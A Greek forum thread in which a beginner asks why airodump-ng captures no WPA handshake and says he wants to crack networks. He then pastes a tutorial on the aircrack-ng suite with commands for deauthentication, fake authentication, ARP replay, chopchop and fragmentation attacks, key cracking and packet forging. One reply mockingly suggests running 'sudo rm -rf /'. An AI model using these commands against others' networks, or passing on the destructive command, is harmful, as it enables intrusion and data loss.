Προς το περιεχόμενο

wpa


bacos

Προτεινόμενες αναρτήσεις

καλησπερα παιδια εχω ενα προβληματακι με το aircrack....λοιπον εχω παρει καρτα δικτιου tl-wn422g υποστηρηζει λοιπον πληκτολογω στον τερματικο airmon-ng start wlan0 και μου εμφανιζει αυτο

 

 

 

Found 5 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!

 

PID Name

776 NetworkManager

778 avahi-daemon

786 avahi-daemon

1046 wpa_supplicant

7987 dhclient

Process with PID 7987 (dhclient) is running on interface wlan0

Process with PID 6272 (airodump-ng) is running on interface wlan1

Process with PID 6725 (airodump-ng) is running on interface wlan1

 

 

Interface Chipset Driver

 

wlan0 RTL8187 rtl8187 - [phy0]

wlan1 Unknown usb - [phy1]

(monitor mode enabled on mon0)

 

 

 

 

 

 

μετα βαζω την εντολη airodump-ng mon0 και περημενω να μου συνδεθεινα δω το bssd και το αλλο μετα πληκτρολογω την εντολη sudo airodump-ng -c 4 --bssid 00:14:BF:7D:AA:0C -w psk mon0

 

 

 

και περημενω να μου βγαλει το handshake να προχωρησω και δεν μου το βγαζει τι κανω λαθως?????????????????????????????????????????

post-212196-0-86666000-1294499242_thumb.png

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Ωραιο το wallpaper του backtrack, αλλα εχω και καλυτερα.

 

Δεν θα πω το γνωστο παραδειγμα μου με τη βιδα για να μην γινω γραφικος.

 

Επειδη δεν βρηκα κατι online, πως ακριβως αναγνωριζει το λινουξ την καρτα σου?

Ανοιγεις ενα τερματικο (konsole), δινεις ενα

>lsusb

και ποσταρεις οτι σου βγαλει.

 

Απο το τσιπακι της καρτας εξαρταται ο driver που θα χρησιμοποιηθει και απο αυτον, και μονο, οι ικανοτητες της για υποκλοπες κλπ.

 

Πληροφοριακα, στο συστημα σου εχεις μια εσωτερικη ασυρματη καρτα της realtek η οποια ειναι αξιοπρεπεστατη.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

Bus 004 Device 002: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)

Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

Bus 003 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub

Bus 001 Device 006: ID 0cf3:1006 Atheros Communications, Inc. TP-Link TL-WN422G v2 802.11g [Atheros AR9271]

Bus 001 Device 005: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

Bus 001 Device 002: ID 0402:5602 ALi Corp. M5602 Video Camera Controller

Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

 

 

 

 

 

και κατι αλλο παταω την εντολη sudo airodump-ng -c 11 --bssid 00:1F:9F:EB:9A:33 -w output mon0 και μου εμφανιζει αυτα

CH 11 ][ Elapsed: 0 s ][ 2011-01-09 00:59

 

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

 

00:1F:9F:EB:9A:33 -71 0 14 0 0 11 54 WPA2 CCMP PSK mine

 

BSSID STATION PWR Rate Lost Packets Probes

 

 

 

 

 

 

 

 

 

 

 

 

 

 

και δεν μου εμφανιζει την δευτερη στηλη για πιο λογο και το αφηνω πολι ωρα και αν μου εμφανηση μια στειλη δεν θα μου βγαζει το bssid στην δευτερη στηλη

 

α και κατι αλλο τωρα ubuntu εχω

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Επειδή κατάλαβα ότι μάλλον δεν γνωρίζεις πολλά περι του θέματος, και επειδή δεν είναι ορθό να σου εξηγούμε τι σημαίνει το κάθε output της aircrack σουίτας, σου προτείνω να διαβάσεις μερικά πράγματα περι wireless security και το documentation του aircrack, και αν έχεις επιπλέον απορίες που δε σου λύθηκαν, εδώ είμαστε.

 

Γιατί, tbh, εγώ δεν έχω καταλάβει ακριβώς τι πας να κάνεις.

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

αυτο που θελω ν κανω ειναι να κρακαρο δικτιο ψαχνο εντολες σε βιντεακια στο youtube alla τοποτα δεν υποστηριζοντε μηπως χριαζοντε καπιεσ ρυθμησεις προτα για να τα κανω αυτα........οσο και να εχω διαβασει δικτια δεν μπορο να καταλαβο πωσ να βαλω τις εντολες με υπολογηστες δεν εχω σχεση τωρα τελευτεα αρχισα να ασχολουμε θα με βοηθεισης να το καταλαβω ολο αυτο το θεμα μηπως κανω λαθως την εντολες μηπως χριαζοντε καποιεσ ρυθμησεις παντως αν με βοηθησεισ εμενα θα βοηθησεις και αλλα παιδια που σηγουρα θα ψαχνοντε για αυτο τον λογο........... σε αλλα site δεν ειπαρχει, κατι σε ελληνικα μηλαω τωρα.............

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Εμένα πάντως μου κάνει εντύπωση το πόσοι πολλοί έχουν πάει σε backtrack και αναρωτιέμαι για τους λόγους (από τη στιγμή που, από ότι φαίνεται, δεν έχουν όρεξη να κάτσουν να διαβάσουν από μόνοι τους και αναζητούν την μασημένη τροφή).

 

Για τους λόγους, εννοείτε πέρα από τους προφανείς, ε;! :P

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

xaxaxaxaxaxaxaxaxaxaxaxx :P πανω κατω στην θεωρια ξερω τι κανει το καθενα στην πραξη ειναι που κολαω δεν νομιζω να ειναι τοσο κακκο.....για να το παρουμε απ την αλλη πλευρα να εχουμε την μασημενη τροφη ετοιμη να το κανουμε στην πραξη ωστε να ενθουσιαστουμε και να εχουμε ενα κηνητρο να κατσουμε να ψαχτουμε περησσοτερο δικο δεν εχω? :P εξαλου αν δωσουμε οδηγιες πως να γυνει ολα τα κολοπαιδα σαν και μενα :P σ αυτο το site θα μπενουν και θα συλεγουν πληρωφοριες οποτε με ενα σπαρο 2 τρυγωνια

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

Λοιποοοον.

 

Θεωρια.

Interfaces, μαθημα 0.

Στο λινουξ η καθε καρτα αντιστοιχιζεται σε ενα interface. Στην περιπτωση σου η καρτα της realtek ειναι στο wlan0 και η usb στο wlan1

Κατι σαν το "Network connection 1/2/3" των windows. Οποτε, για να κανεις χρηση της usb καρτας οπου λεει wlan0 εσυ θα επρεπε να βαλεις wlan1.

 

Πραξη.

Για να δουλεψει η tplink σου θελει τον ath9k_htc, ο οποιος περιλαμβανεται στον πυρηνα απο την εκδοση 2.6.35 και μετα.

Για το backtrack αυτο σημαινει οτι θες την εκδοση 4 R2 γιατι αυτη εχει τον 2.6.35. Η R1 εχει τον .34 και η σκετη 4 τον .32 αν θυμαμαι καλα.

Η 3 εχει τον αρχαιο .21, εποχης q3-q4 2007.

Οποτε, με οτιδηποτε κατω απο 4 R2, απλα δεν δουλευει, και οπως λεει και παραπανω "wlan1 Unknown usb - [phy1]".

 

Κακια.

Μετα απο οσα εχω δει για επιδοξους hackers με backtrack εδω, φταιω εγω αν την επομενη φορα προτεινω να τρεξεις καποιος την εντολη "sudo rm -rf /" ?

 

Απορια.

Αφου εχεις ηδη μια ασυρματη καρτα σε usb, γιατι να παρεις αλλη?

Συνδέστε για να σχολιάσετε
Κοινοποίηση σε άλλες σελίδες

ΕΧΩ ΚΑΤΣΕΙ ΚΑΙ ΤΟ ΕΧΩ ΔΙΑΒΑΣΕΙ ΟΛΑ ΑΥΤΟ ΑΛΛΑ ΕΧΩ ΚΑΠΟΙΑ ΠΡΟΒΛΗΜΑΤΑ ΔΕΝ ΕΙΝΑΙ ΟΤΙ ΕΙΜΑΙ ΑΣΧΕΤΟΣ ΓΙΑΥΤΟ ΣΑΣ ΖΗΤΑΩ ΤΗΝ ΒΟΗΘΕΙΑ ΣΑΣ

 

 

 

 

 

 

 

 

Σε αυτό το άρθρο θα κάνουμε μια εισαγωγή στη σουίτα aircrack-ng, θα δούμε πως μπορούμε να το εγκαταστήσουμε στα linux και θα γνωρίσουμε τα βασικά εργαλεία που μας προσφέρει.

Εισαγωγή στο aircrack-ng

 

Το aircrack-ng είναι μια σουίτα η οποία περιλαμβάνει εργαλεία που μας βοηθούν να επαναφέρουμε το κλειδί που χρησιμοποιείτε από ένα Wireless Access Pint ώστε να κρυπτογραφήσει τα δεδομένα που διακινούνται στο δικτυο. Επίσης, μας βοηθάει στον έλεγχο της ασφάλειας του δικτύου μας καθώς μπορούμε να ελέγκουμε κατά πόσο το κλειδί που έχουμε χρησιμοποιήσει στο AP μας μπορεί να σπάσει. Τα βασικά εργαλεία που περιλαμβάνει η σουίτα aircrack-ng είναι:

 

* aircrack-ng

* airodump-ng

* aireplay-ng

* airmon-ng

* packetforge-ng

 

Θα αναλύσουμε ένα-ένα τα παραπάνω εργαλεία παρακάτω στο παρόν άρθρο.

Εγκατάσταση του aircrack-ng

 

Στο σημείο αυτό θα δούμε πως μπορούμε να εγκαταστήσουμε τη σουίτα aircrack-ng σε ένα σύστημα linux.

 

Αρχικά κατεβάζουμε την τελευταία έκδοση του aircrack-ng από τη σελίδα: www.aircrack-ng.org και αφού αποσυμπιέσουμε το tarball που κατεβάσαμε εκτελούμε:

 

make

 

Στη συνέχεια αποκτούμε δικαιώματα root:

 

su

 

και εγκαθηστούμε το aircrack-ng ως εξής:

 

make install

 

Πλέον, μπορούμε να χρησιμοποιήσουμε το aircrack-ng. Ωστόσο, αν θέλουμε να μειώσουμε δραματικά το χρόνο που απαιτείται για να σπάσουμε ένα κλειδί θα πρέπει να ενεργοποιήσουμε το packet injection.. To packet injection είναι μια τεχνική με την οποία μπορούμε να στείλουμε πακέτα σε ένα ασύρματο δίκτυο χωρίς να συμμετέχουμε σε αυτό. Για να δουλέψει το injection θα πρέπει να έχουμε εγκαταστήσει τα κατάλληλα drivers για την κάρτα δικτύου μας καθώς και τα απαραίτητα patch. Μπορείτε να δείτε εδώ πως να εγκαταστήσετε μια atheros based κάρτα. Διαφορετικά αν έχετε κάποια άλλη ασύρματη κάρτα ανατρέξτε εδώ για οδηγίες.

airmon-ng

 

To airmon-ng είναι ένα script το οποίο μας βοηθάει να θέσουμε την κάρτα δικτύου μας σε monitor mode. Επίσης, μπορεί να χρησιμοποιηθεί ώστε να γυρίσουμε την κάρτα δικτύου μας σε κατάσταση managed.

 

Το airmon-ng το χρησιμοποιούμε πριν από τα υπόλοιπα εργαλεία ώστε να θέσουμε την κάρτα μας σε κατάσταση monitor.

Χρήση

 

airmon-ng {start|stop} {interface}[channel]

 

* To start|stop προσδιορίζει αν θα ενεργοποιήσουμε ή αν θα απενεργοποιήσουμε την κατάσταση monitor της ασύρματης κάρτας μας.

* Το interface προσδιορίζει την κάρτα δικτύου για την οποία θέλουμε να ενεργοποιήσουμε/ απενεργοποιήσουμε την κατάσταση monitor.

* Το channel προσδιορίζει το κανάλι στο οποίο θέλουμε να δουλέψει η κάρτα μας. Την χρησιμοποιούμε αν γνωρίζουμε ήδη σε πιο κανάλι εκπέμπει το AP στόχος.

 

Ας δούμε κάποιες τυπικές περιπτώσεις χρήσης του:

 

Αν θέλουμε να ενεργοποιήσουμε την κατάσταση monitor στη διεπαφή δικτύου wlan0 εκτελούμε:

 

airmon-ng start wifi0

 

Αν θελουμε να απενεργοποιήσουμε την κατάσταση monitor στη διεπαφή wifi0 εκτελούμε:

 

airmon-ng stop wifi0

 

Αν θέλουμε να ενεργοποιήσουμε την κατάσταση monitor στη διεπαφή eth1 και θέλουμε αυτή να λειτουργήσει στο κανάλι 11 εκτελούμε:

 

airmon-ng start eth1 11

 

Αν θέλουμε να πάρουμε πληροφορίες για τη διεπαφή wifi0 εκτελούμε:

 

airmon-ng wifi0

 

Για να σιγουρευτούμε ότι το monitor ενεργοποιήθηκε για παράδειγμα στη διεπαφή wifi0 μπορούμε να εκτελέσουμε:

 

iwconfig wifi0

 

και να δούμε την ένδειξη δίπλα στο "Mode:" η οποία πρέπει να είναι "Monitor".

airodump-ng

 

To airodump-ng χρησιμοποιείται για την καταγραφή πακέτων από 802.11 δίκτυα και για τη συλογή των WEP IVs (Initialization Vectors). Επίσης, μπορεί να χρησιμοποιηθεί για τον εντοπισμό των δικτύων 802.11 που βρίσκονται εντός της κάληψης της κάρτας μας.

 

Πριν τρέξετε το airodump-ng θα πρέπει να έχετε θέσει την κάρτα σας σε κατάσταση monitor.

Χρήση

 

airodump-ng {options} {interface}[,{interface},...]

 

Οι βασικές επιλογές είναι οι εξής:

 

* --channel ή -c: κατέγραψε πακέτα στο συγκεκριμένο κανάλι

* --bssid : Επικεντώσου στο AP με MAC διεύθυνση

* --write ή -w : Κατέγραψε τα πακέτα που λαμβάνεις σε αρχείο το οποίο να ξεκινάει με τη συμβολοσειρά

* -r file: Διάβασε πακέτα από το αρχείο file.

* --ivs: Μην αποθηκεύεις ολόκληρο το πακέτο αλλά μόνο το IV. Χρησιμοποιείται για εξικονόμηση χώρου στο δίσκο, ωστόσο δε προτείνεται η χρήση της.

 

To interface προσδιορίζει την κάρτα δικτύου που θα χρησιμοποιήται ώστε να καταγράφουμε πακέτα. Παρατηρήστε ότι μπορούμε να χρησιμοποιήσουμε πολλές διεπαφές αρκεί να τις χωρίσουμε με κόμμα.

 

Ας δούμε τώρα μερικές περιπτώσεις χρήσης του airodump-ng. Υποθέτουμε ότι η διεπαφή που χρησιμοποιούμε έχει το αναγνωριστικό ath1:

 

Αρχικά, θέλουμε να εντοπίσουμε τα ασύρματα δίκτυα που είναι εντός της εμβέλειας της κάρτας μας. Για το σκοπό αυτό εκτελούμε:

 

airodump-ng ath1

 

Στην έξοδο θα πάρουμε κάτι σαν:

 

[ CH 7 ][ Elapsed: 16 s ][ 2009-08-24 17:54 ]

 

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

 

00:21:29:78:15:8C 39 36 0 0 11 54 WPA2 CCMP PSK Giorg

00:21:63:44:63:38 42 26 2 0 11 48 WEP WEP gio

00:1F:9F:EB:B2:2B 6 15 3 0 1 48 OPN Thoms

 

BSSID STATION PWR Lost Packets Probes

 

00:21:63:44:63:38 00:16:6F:3A:57:C9 68 1 5

 

Ας αναλύσουμε λίγο το αποτέλεσμα:

 

* Στην καρτέλα BSSID εμφανίζεται η MAC address των APs που βρίσκονται εντός της εμβέλειας της κάρτας μας.

* Στην καρτέλα PWR βλέπουμε την ισχύ του σήματος

* Στην καρτέλα Beacon βλέπουμε τα beacon frames που έχει έχουμε λάβει από κάθε AP

* Στην καρτέλα #Data βλέπουμε τα πακέτα που έχουμε λάβει από κάθε AP

* Στην καρτέλα #/s βλέπουμε το ρυθμό με τον οποίο εμείς στέλνουμε πακέτα στο AP

* Στην καρτέλα CH βλέπουμε το κανάλι στο οποίο λειτουργεί το AP

* Στην καρτλελα ENC βλέπουμε το είδος της κρυπτογράφησης που χρησιμοποιείται.

* Στην καρτέλα ESSID βλέπουμε το όνομα του δικτύου

* Όταν υπάρχουν συνδεδεμένοι πελάτες στα AP εμφανίζονται κάτω από αυτά τα στοιχεία των πελατων. Για παράδειγμα:

 

BSSID STATION PWR Lost Packets Probes

 

00:21:63:44:63:38 00:16:6F:3A:57:C9 68 1 5

 

* Κάτω από το BSSID φαίνεται η διεύθυνση του AP στο οποίο είναι συνδεδεμένος ο πελάτης.

* Κάτω από το Station φαίνεται η διεύθυνση MAC του πελάτη

* Κάτω από το Packets φαίνεται ο αριθμός των πακέτων που έχουν καταγραφεί και προορίζονται για τον συγκεκριμένο πελάτη

 

Για να λάβουμε γρηγορότερα τα πακέτα που στέλνει ο AP που μας ενδιαφέρει, και να καταγράψουμε τα πακέτα που θα κάνουμε inject πρέπει να επικεντρωθούμε στον συγκεκριμένο AP. Εκτελούμε:

 

airodump-ng -c 11 --bssid 00:21:63:44:63:38 -w output ath1

 

Ας δούμε τις επλογές που χρησιμοποιούμε:

 

* -c: καθορίζει το κανάλι

* --bssid: καθορίζει τη διεύθυνση MAC του AP στόχου

* -w καθορίζει το όνομα του αρχείου στο οποίο θα αποθηκευτούν τα πακέτα που καταγράφονται. Στο παραπάνω παράδειγμα αυτό θα ξεκινάει από τη συμβολοσειρά "output".

 

aireplay-ng

 

To aireplay-ng χρησιμοποιείται για να κάνουμε inject πακέτα σε κάποιο ασύρματο δίκτυο στόχο. Η κύρια λειτουργία του είναι να δημιουργήσουμε κυκλοφορία πακέτων ώστε να καταγράφουμε πολύ περισσότερα πακέτα από αυτά που ανταλλάσονται πραγματικά στο δίκτυο. Ωστόσο, μπορεί να χρησιμοποιηθεί ώστε να αναγκάσει κάποιον ασύρματο client να συνδεθεί ή να αποσυνδεθεί από το AP και να εκτελέσει ψεύτικες πιστοποιήσεις ώστε να συνδεθούμε εμείς με το AP στόχο (αυτό μας βοηθάει στην περίπτωση που δεν υπάρει άλλος πελάτης συνδεδεμένος).

Επιθέσεις που υποστηρίζονται

 

* Attack 0: Deauthentication (-0)

* Attack 1: Fake authentication (-1)

* Attack 2: Interactive packet replay (-2)

* Attack 3: ARP request replay attack (-3)

* Attack 4: KoreK chopchop attack (-4)

* Attack 5: Fragmentation attack (-5)

* Attack 9: injection test (-9)

 

Θα δούμε πως να επιλέγουμε την κατάλληλη επίθεση σε επόμενο άρθρο.

Χρήση

 

aireplay-ng {options} {replay interface}

Φίλτρα

 

Για όλες τις επιθέσεις, εκτός από τις deauthentication και fake authentication, μπορείτε να χρησιμοποιήσετε τα εξής φίλτρα. Για μια τυπική χρήση χρησιμοποιήστε μόνο το φίλτρο (-B) που θα δούμε:

 

* -b bssid: H MAC διεύθυνση του AP στόχου

* -m length: Ελάχιστο μέγεθος πλαισίου

* -n length: Μέγιστο μέγεθος πλαισίου

 

Επιλογές replay

 

* -h mac: Θέσε την MAC διεύθυνση πηγής ως mac. Χρησιμοποιήται συχά ώστε τα πακέτα που θα γίνονται inject να έχουν σαν διεύθυνση source τη διεύθυνση MAC καποιου σχετιζόμενου client. H διεύθυνση που θέτουμε εδώ θα πρέπει να ανήκει σε κάποιον client που είναι συνδεδεμένος στο AP ή στη διεύθυνση της κάρτας μας στην περίπτωση που έχουμε πραγματοποιήσει fake authentication.

* -a bssid: Θέτουμε τη διεύθυνση MAC του AP στόχου ως bssid. Χρησιμοποιείται συνήθως σε επιθέσεις deauthentication και fake authentication.

* -e essid: Θέσε το όνομα ESSID του στόχου σε essid. Χρησιμοποιείται σε επιθέσεις deauthentication, fake authentixation.

* -q time: Στείλε πακέτα keep alive κάθε 10 δευτερόλεπτα. Χρησιμοποιείται στην επίθεση fake authentication.

 

Επιλογές source

 

* interface: Κατέγραψε πακέτα από αυτή τη διεπαφή

* -r file: Κάνε εξαγωγή πακέτων από το αρχείο file

 

Παραδείγματα χρήσης

 

Στο σημείο αυτό θα δούμε κάποια παραδείγματα χρήσης του aireplay-ng.

Test packet injection

 

Για να δείτε αν λειτουργεί το injection εκτελέστε:

 

aireplay-ng -9 -e gio -a 00:21:63:44:63:38 ath1

 

* -e gio: Το όνομα του ασύρματου δικτύου στόχου

* -a 00:21:63:44:63:38: H MAC address του AP στόχου

* -9: το είδος της επίθεσης (test injection).

 

Το αποτέλεσμα θα πρέπει να είναι κάπως έτσι:

 

helios:/home/giorgos# aireplay-ng -9 -e gio -a 00:21:63:44:63:38 ath1

20:09:03 Trying broadcast probe requests...

20:09:03 Injection is working!

20:09:04 Found 1 AP

 

20:09:04 Trying directed probe requests...

20:09:04 00:21:63:44:63:38 - channel: 11 - 'gio'

20:09:06 Ping (min/avg/max): 1.497ms/14.586ms/42.846ms

20:09:06 30/30: 100%

 

Θα πρέπει να έχετε πάνω από 85% επιτυχία στα τεστ ώστε το injection να λειτουργεί σωστά.

fake authentication

 

Για να εκτελέσετε fake authentixation στο ασύρματο δίκτυο με όνομα gio και διεύθυνση MAC 00:21:63:44:63:38 εκτελέστε:

 

aireplay-ng -1 0 -e gio -a 00:21:63:44:63:38 -h 00:16:3F:23:12:38 ath1

 

όπου:

 

* -1: καθορίζει την επίθεση fake authentication

* 0: καθορίζει το χρόνο του reassosiation σε δευτερόλεπτα

* -a: καθορίζει τη MAC διεύθυνση του στόχου

* -h: καθορίζει τη MAC διεύθυνση της κάρτας δικτύου μας

* -e καθορίζει το όνομα του ασύρματου δικτύου στόχου

 

Ένας καλύτερος τρόπος για να πραγματοποιήσετε fake authentication είναι ο εξής:

 

aireplay-ng -1 6000 -ο 1 -q 10 -e gio -a 00:21:63:44:63:38 -h 00:16:3F:23:12:38 ath1

όπου:

 

* 6000: Κάνε reauthentication κάθε 6000 δευτερόλεπτα

* -o 1: Στείλε μόνο ένα σετ πακέτων reauthentication τη φορά

* -q 10: Στείλε πακέτα Keep alive κάθε 10 δευτερόλεπτα

 

 

Deauthentication

 

Για να αποπιστοποιήσετε τον client με MAC διεύθυνση 00:16:6F:3A:57:C9 από το AP με MAC 00:21:63:44:63:38 εκτελέστε:

 

aireplay-ng -0 10 -a 00:21:63:44:63:38 -c 00:16:6F:3A:57:C9 ath1

 

Ας δούμε τις επιλογές:

 

* -0 εκτέλεσε αποσυσχέτιση και στείλε 10 πακέτα αποσυσχέτισης

* -a η MAC address του AP στόχου

* -c η MAC address του συνδεδεμένου πελάτη

 

Interactive packet replay

 

Για να κάνουμε inject πακέτα σε ένα ασύρματο δίκτυο εκτελούμε:

 

aireplay-ng -2 packet ath1

 

όπου:

 

* -2: καθορίζει την επίθεση Interactive packet replay

* packet: διάβασε τα πακέτα που θα στείλεις από το αρχείο packet

 

ARP Request

 

Για να καταγράψουμε πακέτα ARP από το ασύρματο δίκτυο στόχο και στη συνέχεια να το κάνουμε inject στο δίκτυο εκτελούμε:

 

aireplay-ng -3 -b 00:21:63:44:63:38 -h 00:16:6F:3A:57:C9 ath1

 

 

Ας δούμε τις επιλογές που χρησιμοποιήσαμε:

 

* -3: καθορίζει την κατάσταση arp request replay

* -b: Η MAC address του AP στόχου

* -h: Η ΜAC address του συνδεδεμένου client

 

H κάρτα μας θα ξεκινήσει να διαβάζει πακέτα μέχρι να εντοπίσει ένα ARP:

 

helios:/home/giorgos# aireplay-ng -3 -b 00:21:63:44:63:38 -h 00:16:6F:3A:57:C9 ath1

The interface MAC (00:21:27:E8:45:B1) doesn't match the specified MAC (-h).

ifconfig ath1 hw ether 00:16:6F:3A:57:C9

Saving ARP requests in replay_arp-0824-181801.cap

You should also start airodump-ng to capture replies.

Read 201 packets (got 0 ARP requests), sent 0 packets...(0 pps)

 

Μόλις το ARP πακέτο διαρρεύσει στο δίκτυο, θα καταγραφεί από το aireplay-ng του βήματος 3 και θα αρχίσει να γίνεται inject στο AP. To aireplay-ng του βήματος 3 θα ανταποκριθεί ως:

 

18:23:29 Packets per second adjusted to 375t 1172 packets...(4 pps)

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

18:23:37 Packets per second adjusted to 282ent 3094 packets...(11 pps)

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

18:23:45 Packets per second adjusted to 212ent 4512 packets...(16 pps)

18:24:37 Packets per second adjusted to 159 sent 14692 packets...(45 pps)

18:25:51 Packets per second adjusted to 120, sent 25157 packets...(64 pps)

18:25:53 Packets per second adjusted to 90

18:25:55 Packets per second adjusted to 68

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

18:26:15 Packets per second adjusted to 51), sent 26311 packets...(64 pps)

18:26:17 Packets per second adjusted to 39

18:26:19 Packets per second adjusted to 30

18:26:21 Packets per second adjusted to 23

Read 153778 packets (got 36631 ARP requests), sent 34752 packets...(44 pps)

 

Chopchop attack

 

Για να πραγματοποιήσουμε επίθεση chopchop εκτελούμε:

 

aireplay-ng -4 -h 00:16:6F:32:24:48 -b 00:21:22:23:34:12 ath1

 

όπου:

 

* -4: εκτέλεσε επίθεση chopchop

* -h: καθορίζει τη διεύθυνση της κάρτας μας. Θα πρέπει νωρίτερα να έχουμε εκτελέσει fake authentication για δουλέψει το chopchop.

* -b: καθορίζει τη διεύθυνση του AP στόχου

 

Fragmentation attack

 

Για να πραγματοποιήσουμε επίθεση fragmentation εκτελούμε:

 

aireplay-ng -5 -h 00:16:6F:32:24:48 -b 00:21:22:23:34:12 ath1

 

όπου:

 

* -5: εκτέλεσε επίθεση fragmentation

* -h: καθορίζει τη διεύθυνση της κάρτας μας. Θα πρέπει νωρίτερα να έχουμε εκτελέσει fake authentication για δουλέψει το chopchop.

* -b: καθορίζει τη διεύθυνση του AP στόχου

 

aircrack-ng

 

To aircrack-ng είναι το εργαλείο που χρησιμοποιούμε για να σπάσουμε το κλειδί κρυπτογράφησης ενός AP. Ως είσοδος χρησιμοποιείται ένα αρχείο με πακέτα που έχει καταγράψει το airodump-ng. To aircrack-ng για να σπάσει το κλειδί χρησιμοποιεί τις εξής μεθόδους:

 

* PTW

* FMS/ KoreK (default)

* Dictionary attacks

 

Χρήση

 

aircrack-ng [options] {capture file(s)}

 

οι βασικές επιλογές που μπορούμε να χρησιμοποιήσουμε είναι:

 

* -a mode: καθορίζει το είδος της επίθεσης. (1 = static WEP, 2 = WPA/WPA2-PSK)

* -b bssid: Καθορίζει το δίκτυο στόχο. Το bssid είναι η MAC address του AP στόχου

* -c: Χρησιμοποίησε μόνο αλφαριθμητικούς χαρακτήρες για να βρεις το κλειδί

* -t: Χρησιμοποίησε μόνο δεκαεξαδικούς χαρακτήρες για να βρεις το κλειδί

* -h: Χρησιμοποίησε μόνο αριθμητικούς χαρακτήρες για να σπάσεις το κλειδί

* -n: καθορίζει το μήκος του κλειδιού (64 για 40-bit WEP Key, 128 για 104-bit WEP Key). Το default είναι το 128.

* -f fudge: Το default είναι το 2 για κλειδί 104 bit και 5 για κλειδί 40-bit. Καθορίστε πιο μεγάλη τιμή για να αυξήσετε την επίθεση του brute force.

* -k attack: Υπάρχουν 17 επιθέσεις KoreK. Μπορείτε να τις απενεργοποιήσετε θέτοντας -k 1, -k 2 κλπ.

* -z: Χρησιμοποίησε την τεχνική PTW, το default είναι η τεχνική FMS/ KoreK

* -w: (Για WPA) Καθορίζει το path για κάποιο wordlist

 

θα δούμε διάφορες συμβουλές χρήσης του aircrack-ng σε επόμενο άρθρο.

packetforge-ng

 

Ο σκοπός του packetforge-ng είναι να δημιουργήσει κρυπτογραφημένα πακέτα τα οποία στη συνέχεια θα μπορούν να χρησιμοποιηθούν για injection. μπορείτε να κατασκευάσετε πακέτα διαφόρων ειδών, όπως ARP requests, UDP, ΙCMP καθώς και custom πακέτα.

 

Για να δημιουργήσουμε ένα κρυπτογραφημένο πακέτο θα πρέπει να έχουμε τον αλγόριθμο PRGA (pseudo random generation algorithm).Ο αλγόριθμος αυτός χρησιμοποιείται για να κρυπτογραφήσουμε στη συνέχεια τα πακέτα που δημιουργούμε.. O αλγόριθμος PRGA μπορεί να κλαπεί μέσω των επιθέσεων chopchop ή fragmentation όπως θα δούμε σε επόμενο άρθρο.

Χρήση

 

packetforge-ng {mode} {options}

Modes

 

* -arp: δημιούργησε ένα πακέτο ARP (-0).

* -udp: δημιούργησε ένα πακέτο UDP (-1)

* -icmp: δημιούργησε ένα πακέτο ICMP (-2)

* -null: δημιούργησε ένα NULL πακέτο (-3)

* -custom: δημιούργησε ένα custom πακέτο (-4)

 

Forge Options

 

* -p : θέσε το πεδίο control του πλαισίου (hex τιμή)

* -a : θέσε τη διεύθυνση MAC του AP

* -c : θέσε τη διεύθυνση MAC του παραλήπτη

* -h : θέσε τη διεύθυνση MAC ου αποστολέα

* -e: Απενεργοποίησε την κρυπτογραφία WEP

* -k : θέσε τη διεύθυνση IP του προορισμού και προαιρετικά τη θύρα προορισμού

* -l : θέσε τη διεύθυνση IP του αποστολέα και προαιρετικά τη θύρα αποστολής

* -t ttl: θέσε το πεδίο Time to live

* -w : γράψε το πακέτο στο αρχείο file

* -j: θέσε το FromDS bit

* -o: καθάρισε το ToDS bit

 

Source Options

 

* -r : διάβασε το πακέτο από το αρχείο file

* -y : Διάβασε τον PRGA από το αρχείο file

 

Παραδείγματα χρήσης

 

Ας δούμε τώρα κάποιες συνήθες χρήσεις του εργαλείου packetforge-ng

Δημιουργία πακέτου ARP Request

 

Αρχικά θα πρέπει να έχουμε "κλέψει" το PRGA που χρησιμοποιεί το AP στόχος και να το έχουμε σώσει σε αρχείο. Αυτό μπορούμε να το πετύχουμε είτε με την επίθεση chopchop είτε με την επίθεση fragmentation. Έστω, λοιπόν, ότι το αρχείο που περιέχει το PRGA είναι το fragment.xor. Εκτελούμε:

 

packetforge-ng -0 -a 02:21:23:24:6F:36 -h 16:6F:32:34:63:12 -k 255.255.255.255 -l 255.255.255.255 -y fragment.xor -w arp-request

 

Ας δούμε τώρα τις παραμέτρους:

 

* -0: Δημιούργησε ένα πακέτο ARP request

* -a: καθορίζει τη διεύθυνση MAC του AP στόχου

* -h: καθορίζει τη MAC διεύθυνση της κάρτας μας. Πρέπει να έχουμε ήδη εκτελέσει επίθεση fake authentication ώστε να έχουμε συνδεθεί στο AP στόχο.

* -k: καθορίζει τη διεύθυνση IP του προορισμού. Εδώ χρησιμοποιούμε τη διεύθυνση broadcast γιατί σχεδόν όλα τα AP ανταποκρίνονται σε αυτή. Αν ξέραμε τη διεύθυνση IP που έχει το AP στόχος (πχ 192.168.1.1) θα μπορούσαμε κάλλιστα να χρησιμοποιήσουμε αυτήν.

* -l: καθορίζει τη διεύθυνση IP του αποστολέα. Χρησιμοποιούμε κι εδώ τη διεύθυνση broadcast (255.255.255.255) γιατί τα περισσότερα AP ανταποκρίνονται σε αυτήν.

* -y: καθορίζει το όνομα του αρχείου που περιέχει τον αλγόριθμο PRGA που έχουμε υποκλέψει

